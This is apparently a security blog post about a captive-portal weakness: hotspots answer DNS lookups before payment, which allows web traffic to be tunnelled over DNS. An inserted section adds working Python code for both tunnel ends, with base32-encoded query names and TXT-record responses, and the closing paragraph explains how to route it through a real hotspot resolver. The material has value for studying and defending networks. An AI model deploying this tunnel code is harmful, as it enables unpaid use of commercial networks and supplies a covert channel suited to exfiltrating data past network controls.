So, let's take this idea of tunneling over ICMP and think about the current hotspot configuration. One thing hotspots haven't considered is IP over DNS. I've confirmed at several hotspots that prior to paying for service a user can perform the following:
1. You can perform DNS resolutions to the default DNS server.
2. You can perform DNS resolutions to an arbitrary DNS server.
The main problem is item #2. By allowing DNS lookups to arbitrary DNS servers, the hotspot creates an alternate channel: anything the client can encode into a DNS query reaches a server of the client's choosing, and the reply comes back in the DNS answer. Note that item #1 alone is enough when the hotspot's default resolver recurses: a query for a name under a domain the attacker controls is forwarded to the attacker's authoritative server, so blocking direct port 53 traffic only removes the easier variant.
Consider the following:
Mobile Laptop
-The mobile laptop is configured with a proxy of localhost:<some port>
-A proxy application is running on the laptop which accepts web requests, encodes them into the name being queried (the only client-controlled payload field in an ordinary DNS query) and forwards them over port 53 to a remote DNS server
Remote Server
-A remote server is configured with a proxy application which accepts DNS requests and decodes the web request from the queried name
-The server application makes the web request and receives the response
-The server wraps the response into the record data (for example TXT records) of a DNS response message and sends it back to the laptop
Mobile Laptop
-The proxy application decodes the response from the DNS answer and sends it to the browser.
The end result would be full web browsing that is tunneled over DNS request/response. There really is no reason why you couldn't expand this idea to a full TCP/IP connection tunneled over DNS; that would just take a little bit more work and a framing layer for sequencing and retransmission.
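The exchange described above, as an added example that is not the author's tool: both halves of the tunnel (laptop-side encoder/decoder and server-side decoder/encoder) working on raw DNS wire format per RFC 1035, run in-process with no network. The zone t.example.com, the chunk sizes and the use of base32 labels upstream and base64 TXT strings downstream are assumptions made for the illustration.

```python
import base64
import struct

TUNNEL_DOMAIN = "t.example.com"   # assumed attacker-controlled zone (illustration only)
QTYPE_TXT, QCLASS_IN = 16, 1
UP_CHUNK = 110        # request bytes per query: base32 -> 176 chars, fits in three 63-char labels
TXT_STR = 255         # max length of one <character-string> in TXT rdata (RFC 1035)


def _encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def _decode_name(msg, off):
    """Return (dotted name, offset after the name); follows compression pointers."""
    labels, end = [], None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # 2-byte pointer into the message
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels), (off if end is None else end)


# ---- laptop side: wrap an HTTP request into DNS queries ----------------------
def client_queries(request, txid=0x1234):
    """Split `request` into base32 labels under TUNNEL_DOMAIN; one TXT query per chunk.
    Name layout (assumed): <seq>.<total>.<b32 labels...>.t.example.com"""
    chunks = [request[i:i + UP_CHUNK] for i in range(0, len(request), UP_CHUNK)] or [b""]
    pkts = []
    for seq, chunk in enumerate(chunks):
        # base32 is case-insensitive, so resolvers that randomise query case cannot corrupt it
        b32 = base64.b32encode(chunk).decode().lower().rstrip("=")
        labels = [b32[i:i + 63] for i in range(0, len(b32), 63)]
        name = ".".join([str(seq), str(len(chunks)), *labels, TUNNEL_DOMAIN])
        header = struct.pack("!HHHHHH", txid + seq, 0x0100, 1, 0, 0, 0)   # RD set, one question
        pkts.append(header + _encode_name(name) + struct.pack("!HH", QTYPE_TXT, QCLASS_IN))
    return pkts


# ---- remote server side: unwrap the request, wrap the reply ------------------
def server_extract(pkt):
    """Parse one tunnel query; returns (txid, seq, total, chunk)."""
    txid = struct.unpack("!H", pkt[:2])[0]
    name, _ = _decode_name(pkt, 12)                  # question starts right after the 12-byte header
    assert name.endswith("." + TUNNEL_DOMAIN), "not a tunnel query"
    parts = name[:-len(TUNNEL_DOMAIN) - 1].split(".")
    seq, total = int(parts[0]), int(parts[1])
    b32 = "".join(parts[2:]).upper()
    return txid, seq, total, base64.b32decode(b32 + "=" * (-len(b32) % 8))


def server_reassemble(pkts):
    parts = {}
    for p in pkts:
        _, seq, total, chunk = server_extract(p)
        parts[seq] = chunk
    assert len(parts) == total, "missing chunks"
    return b"".join(parts[i] for i in range(total))


def server_response(query_pkt, body):
    """Echo the question and return `body` base64-encoded in TXT records.
    A real tunnel pages a large body across several polling queries to stay under
    the 512-byte UDP limit; this example puts it all in one response."""
    txid = struct.unpack("!H", query_pkt[:2])[0]
    question = query_pkt[12:_decode_name(query_pkt, 12)[1] + 4]
    b64 = base64.b64encode(body)
    strings = [b64[i:i + TXT_STR] for i in range(0, len(b64), TXT_STR)]
    answers = b""
    for s in strings:
        rdata = bytes([len(s)]) + s
        answers += b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_TXT, QCLASS_IN, 0, len(rdata)) + rdata
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(strings), 0, 0)   # QR|RD|RA, NOERROR
    return header + question + answers


# ---- laptop side again: pull the HTTP response out of the DNS answer ---------
def client_extract(resp_pkt):
    ancount = struct.unpack("!H", resp_pkt[6:8])[0]
    off = _decode_name(resp_pkt, 12)[1] + 4          # skip the echoed question
    b64 = b""
    for _ in range(ancount):
        _, off = _decode_name(resp_pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", resp_pkt[off:off + 10])
        off += 10
        rdata, off = resp_pkt[off:off + rdlen], off + rdlen
        if rtype == QTYPE_TXT:                       # concatenate the <len><chars> strings
            i = 0
            while i < len(rdata):
                n = rdata[i]
                b64 += rdata[i + 1:i + 1 + n]
                i += 1 + n
    return base64.b64decode(b64)


def roundtrip(request, body):
    """Full laptop -> server -> laptop exchange, entirely in-process."""
    queries = client_queries(request)
    assert server_reassemble(queries) == request
    return client_extract(server_response(queries[-1], body))


if __name__ == "__main__":
    req = b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"     # constructed sample request
    print(roundtrip(req, b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"))
```

Feeding the queries to a real resolver is the only step left out: a captive portal that permits item #2 lets the laptop send them straight to the server, and one that permits only item #1 still relays them through the hotspot's recursive resolver, which is why the example keeps each name under the 253-byte limit and uses a case-insensitive encoding for the upstream data.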
-Michael Coates